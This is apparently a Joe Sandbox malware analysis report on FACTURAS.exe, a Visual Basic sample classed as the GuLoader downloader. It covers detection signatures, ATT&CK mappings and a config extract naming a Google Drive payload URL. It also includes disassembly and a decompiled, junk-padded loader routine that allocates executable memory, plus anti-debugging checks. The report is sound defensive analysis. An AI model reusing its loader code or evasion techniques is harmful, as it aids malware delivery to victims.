Windows Analysis Report FACTURAS.exe

Overview

General Information

Sample Name:FACTURAS.exe
Analysis ID:527918
MD5:ab63f9ba38d9eb4f8bd57ae56a844a31
SHA1:bf1c2a15553f893ff180a307dcb5805c6e440158
SHA256:5d14499fc44a623454a0518972ba97be883b0394f16f08b4265e46ff12ebfeb3
Tags:exe, guloader

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found potential dummy code loops (likely to delay analysis)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to call native functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Program does not show much activity (idle)
Uses code obfuscation techniques (call, push, ret)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Detected potential crypto function

Process Tree

  • System is w10x64
  • FACTURAS.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\FACTURAS.exe" MD5: AB63F9BA38D9EB4F8BD57AE56A844A31)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id="}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    AV Detection:

    Found malware configuration
    Source: 00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id="}
    Multi AV Scanner detection for submitted file
    Source: FACTURAS.exe, ReversingLabs: Detection: 15%
    Source: FACTURAS.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor, URLs: https://drive.google.com/uc?export=download&id=
    Source: FACTURAS.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020DDD75 NtAllocateVirtualMemory, 0_2_020DDD75
    Source: FACTURAS.exe, 00000000.00000000.294184122.0000000000421000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameGILDER.exe vs FACTURAS.exe
    Source: FACTURAS.exe, Binary or memory string: OriginalFilenameGILDER.exe vs FACTURAS.exe
    Source: C:\Users\user\Desktop\FACTURAS.exe, Process Stats: CPU usage > 98%
    Source: FACTURAS.exe, ReversingLabs: Detection: 15%
    Source: C:\Users\user\Desktop\FACTURAS.exe, File created: C:\Users\user\AppData\Local\Temp\~DF26AA5308F7227456.TMP
    Source: FACTURAS.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\FACTURAS.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\FACTURAS.exe, Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: classification engine, Classification label: mal72.troj.evad.winEXE@1/1@0/0

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match, File source: 00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_004013B4 push FFFFFFCDh; iretd 0_2_0040140C
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_0040204F push FFFFFFCDh; iretd 0_2_0040206F
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_004111C3 push ebp; ret 0_2_00411288
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_004051D5 push 0340104Fh; iretd 0_2_004051DB
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_00403A4A push esi; retf 0_2_00403A4B
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_00402B0E push FFFFFFCDh; iretd 0_2_00402D9B
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_00404C1F push eax; ret 0_2_00404C39
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_0040BCD6 push 3CF881B8h; ret 0_2_0040BD03
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_00413574 push 00000039h; iretd 0_2_00413578
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_0040A61E push D9EC50BBh; retf 0_2_0040A62B
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_0040A739 push cs; iretd 0_2_0040A73A
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020DE3B0 pushad ; retf 0_2_020DFF57
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020D17FB push cs; ret 0_2_020D17FC
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020D4AE0 push ebp; retf 0_2_020D4AE1
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020D5860 push esp; retn 0004h 0_2_020D5992
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020D0E32 pushfd ; iretd 0_2_020D0E3C
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020D5F76 push eax; iretd 0_2_020D5F8B
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020D5FC1 push eax; iretd 0_2_020D5F8B
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020D4C41 push ebp; ret 0_2_020D4C42
    Source: C:\Users\user\Desktop\FACTURAS.exe, Process information set: NOOPENFILEERRORBOX
    Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_0041724F rdtsc 0_2_0041724F

    Anti Debugging:

    Found potential dummy code loops (likely to delay analysis)
    Source: C:\Users\user\Desktop\FACTURAS.exe, Process Stats: CPU usage > 90% for more than 60s
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020E5138 mov eax, dword ptr fs:[00000030h] 0_2_020E5138
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020E3589 mov eax, dword ptr fs:[00000030h] 0_2_020E3589
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020D8A51 mov eax, dword ptr fs:[00000030h] 0_2_020D8A51
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020DC9F2 mov eax, dword ptr fs:[00000030h] 0_2_020DC9F2
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020E2C97 mov eax, dword ptr fs:[00000030h] 0_2_020E2C97
    Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_0041724F rdtsc 0_2_0041724F
    Source: C:\Users\user\Desktop\FACTURAS.exe, Code function: 0_2_020E6E65 RtlAddVectoredExceptionHandler, 0_2_020E6E65
    Source: FACTURAS.exe, 00000000.00000002.820123754.0000000000C40000.00000002.00020000.sdmp, Binary or memory string: Program Manager
    Source: FACTURAS.exe, 00000000.00000002.820123754.0000000000C40000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
    Source: FACTURAS.exe, 00000000.00000002.820123754.0000000000C40000.00000002.00020000.sdmp, Binary or memory string: Progman
    Source: FACTURAS.exe, 00000000.00000002.820123754.0000000000C40000.00000002.00020000.sdmp, Binary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 1 | Virtualization/Sandbox Evasion 11 | OS Credential Dumping | Security Software Discovery 11 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 1 | LSASS Memory | Virtualization/Sandbox Evasion 11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Information Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    FACTURAS.exe | 16% | ReversingLabs | Win32.Downloader.GuLoader |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:527918
    Start date:24.11.2021
    Start time:15:29:30
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 7m 41s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:FACTURAS.exe
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:16
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal72.troj.evad.winEXE@1/1@0/0
    EGA Information:Failed
    HDC Information:
    • Successful, ratio: 2.3% (good quality ratio 1.4%)
    • Quality average: 30.1%
    • Quality standard deviation: 28.4%
    HCA Information:
    • Successful, ratio: 53%
    • Number of executed functions: 8
    • Number of non-executed functions: 21
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .exe
    • Override analysis time to 240s for sample files taking high CPU consumption
    Warnings:
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
    • Not all processes were analyzed, report is missing behavior information

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\~DF26AA5308F7227456.TMP
    Process:C:\Users\user\Desktop\FACTURAS.exe
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):16384
    Entropy (8bit):0.9277305547216628
    Encrypted:false
    SSDEEP:48:rJSq2Upu8metqPrIXHimU7zdvP1vncU7pCr8P:VSKUpACLFcUVCrG
    MD5:19809EDD1FF00A1D7C105BC58A97CD02
    SHA1:26FB6D339CF2A7474DE6F785166163FA9B2ADBB1
    SHA-256:4745D04A4BB99D70866D722394D9E71F3FAE597AA84E229A1E3B40F31521594C
    SHA-512:434722936006B56B042FB5C72CAB98D8B7615A5A0E48EE6746DD6839BE029029E3BCECF7EFA49DDC8A9DB016FA472FB9EE1CE75126C13E06D66EAA12166A38F7
    Malicious:false
    Reputation:low

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):4.736694563648511
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.15%
    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:FACTURAS.exe
    File size:135168
    MD5:ab63f9ba38d9eb4f8bd57ae56a844a31
    SHA1:bf1c2a15553f893ff180a307dcb5805c6e440158
    SHA256:5d14499fc44a623454a0518972ba97be883b0394f16f08b4265e46ff12ebfeb3
    SHA512:a8a0d1040432cffc40aaaee619a28703c731b9f3c809db6d915521424a3b4394f3ed46c37c9d7cdd2903d2c8aa33cb9ce87b50acc79de30aa4fbc80b6b264f36
    SSDEEP:1536:t7Do180f9y+zVLdUAcAyB/BMsZWU1/7nYp4r1O/pejim0SD:t7gZz7RcAy/Vkm7nYCr1Omim0S
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...#..K.....................0....................@........

    File Icon

    Icon Hash:981dca909cee36b0

    Static PE Info

    General

    Entrypoint:0x4013b4
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    DLL Characteristics:
    Time Stamp:0x4BCC8F23 [Mon Apr 19 17:13:07 2010 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:d77040f4614bccfda7b8aa2e04863738

    Entrypoint Preview

    Instruction
    push 00401FD0h
    call 00007F4684F9E265h
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    xor byte ptr [eax], al
    add byte ptr [eax], al
    cmp byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    push ecx
    sahf
    cmp ebx, esp
    sub dword ptr [ecx+69h], ecx
    inc esp
    sahf
    fild qword ptr [ebx-74h]
    jnp 00007F4684F9E2A9h
    in eax, 54h
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add dword ptr [eax], eax
    add byte ptr [eax], al
    inc ecx
    add al, dh
    pop es
    inc ecx
    add byte ptr [ecx+ebp*2+6Ch], dl
    insb
    jns 00007F4684F9E2E5h
    xor dword ptr [eax], eax
    add byte ptr [eax], al
    add byte ptr [eax], al
    dec esp
    xor dword ptr [eax], eax
    add eax, E27047BEh
    sbb eax, ebx
    push cs
    inc esp
    xchg eax, esp
    push FFFFFFCDh
    iretd
    dec ecx
    mov dl, FEh
    imul eax, dword ptr [esi-081F81EBh], 3Dh
    adc cl, byte ptr [esi-62h]
    ror byte ptr [ebx], 1
    xor eax, FD7A371Dh
    cmp cl, byte ptr [edi-53h]
    xor ebx, dword ptr [ecx-48EE309Ah]
    or al, 00h
    stosb
    add byte ptr [eax-2Dh], ah
    xchg eax, ebx
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    clc
    or dword ptr [eax], eax
    add byte ptr [ebx], bl
    or dword ptr [eax], eax
    add byte ptr [eax], al
    or al, byte ptr [eax]
    push ebx
    popad
    insd
    popad
    jc 00007F4684F9E2DBh
    jne 00007F4684F9E2DFh
    jnc 00007F4684F9E2A5h
    add byte ptr [4F000D01h], cl
    jc 00007F4684F9E2D6h
    outsb
    jnc 00007F4684F9E2DDh
    popad
    jo 00007F4684F9E2DBh
    je 00007F4684F9E2D7h

    Data Directories

    Name | Virtual Address | Virtual Size | Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1dc04 | 0x28 | .text
    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x21000 | 0xf40 | .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x230 | 0x20 |
    IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x11c | .text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

    Sections

    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
    .text | 0x1000 | 0x1d10c | 0x1e000 | False | 0.344938151042 | data | 4.91647345609 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .data | 0x1f000 | 0x141c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
    .rsrc | 0x21000 | 0xf40 | 0x1000 | False | 0.337158203125 | data | 3.27489444604 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    Name | RVA | Size | Type | Language | Country
    CUSTOM | 0x21e02 | 0x13e | MS Windows icon resource - 1 icon, 16x16, 16 colors | English | United States
    CUSTOM | 0x21cc4 | 0x13e | MS Windows icon resource - 1 icon, 16x16, 16 colors | English | United States
    RT_ICON | 0x2141c | 0x8a8 | data | |
    RT_GROUP_ICON | 0x21408 | 0x14 | data | |
    RT_VERSION | 0x21170 | 0x298 | data | Turkmen | Turkmenistan

    Imports

    DLL | Import
    MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaRecDestruct, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaInStr, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaRecDestructAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

    Version Infos

    Description | Data
    Translation | 0x0442 0x04b0
    LegalCopyright | Lips
    InternalName | GILDER
    FileVersion | 1.00
    CompanyName | Lips
    LegalTrademarks | Lips
    ProductName | Lips
    ProductVersion | 1.00
    FileDescription | Lips
    OriginalFilename | GILDER.exe

    Possible Origin

    Language of compilation system | Country where language is spoken
    English | United States
    Turkmen | Turkmenistan

    Network Behavior

    No network behavior found

    System Behavior

    General

    Start time:15:30:30
    Start date:24/11/2021
    Path:C:\Users\user\Desktop\FACTURAS.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\FACTURAS.exe"
    Imagebase:0x400000
    File size:135168 bytes
    MD5 hash:AB63F9BA38D9EB4F8BD57AE56A844A31
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Visual Basic
    Yara matches:
    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmp, Author: Joe Security
    Reputation:low

    Disassembly

    Code Analysis

      Executed Functions

      Memory Dump Source
      • Source File: 00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e12694ea7aed653b8126d3ebfde82874ee063094d305d87ec2adbf4268e8fd19
      • Instruction ID: 6f8e8a3eb8f9c976cd38e67b95e28bff2df7285e6ced879201dc59f248591627
      • Opcode Fuzzy Hash: e12694ea7aed653b8126d3ebfde82874ee063094d305d87ec2adbf4268e8fd19
      • Instruction Fuzzy Hash: 76619D31608385CFDF799E28CD65BEAB7A2BF95310F51412ACD4B8B264D7309A81DB41
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • NtAllocateVirtualMemory.NTDLL ref: 020DE119
      Memory Dump Source
      • Source File: 00000000.00000002.820204862.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: false
      Yara matches
      Similarity
      • API ID: AllocateMemoryVirtual
      • String ID:
      • API String ID: 2167126740-0
      • Opcode ID: 217cc6775089645a03dfea07f2658c714b2c29ddd1e1ad8d8bbe00d91d6c1707
      • Instruction ID: 8deabb25c0525469df2e69731b331f5dc404f2e847d627b152866c00bdc2b31f
      • Opcode Fuzzy Hash: 217cc6775089645a03dfea07f2658c714b2c29ddd1e1ad8d8bbe00d91d6c1707
      • Instruction Fuzzy Hash: 8241EAB66053848FDBB49E68CC517EE36E2EF58364F01041EEC8D9B220D7348A81DF42
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 36%
      			E004036BD(void* __ebx, void* __edx) {
      				intOrPtr* _t179;
      				intOrPtr* _t183;
      				void* _t184;
      				intOrPtr _t193;
      				void* _t194;
      				void* _t203;
      				void* _t224;
      				signed int* _t225;
      
      				_t194 = __edx;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				_t193 =  *0x82f616bd;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				asm("cld");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				asm("clc");
      				asm("cld");
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				_t179 =  *((intOrPtr*)(0x401000));
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				do {
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					 *_t225 =  *_t225 ^ 0x00000000;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      					_t179 = _t179 + 0x20 - 0x21;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					asm("fsqrt");
      				} while ( *_t179 != _t193);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				asm("cld");
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				asm("cld");
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *_t225 =  *_t225;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				asm("cld");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *_t225 =  *_t225;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				asm("cld");
      				asm("cld");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				asm("clc");
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *_t225 =  *_t225;
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				asm("cld");
      				asm("cld");
      				asm("clc");
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				asm("clc"); // executed
      				VirtualAlloc(0, 0x1d000, 0x1000, 0x40); // executed
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				_t183 = E00403972(__ebx);
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				_t203 = 0;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				do {
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					asm("cld");
      					asm("clc");
      					 *_t225 =  *_t225;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					asm("cld");
      					 *_t225 =  *_t225 ^ 0x00000000;
      					asm("cld");
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
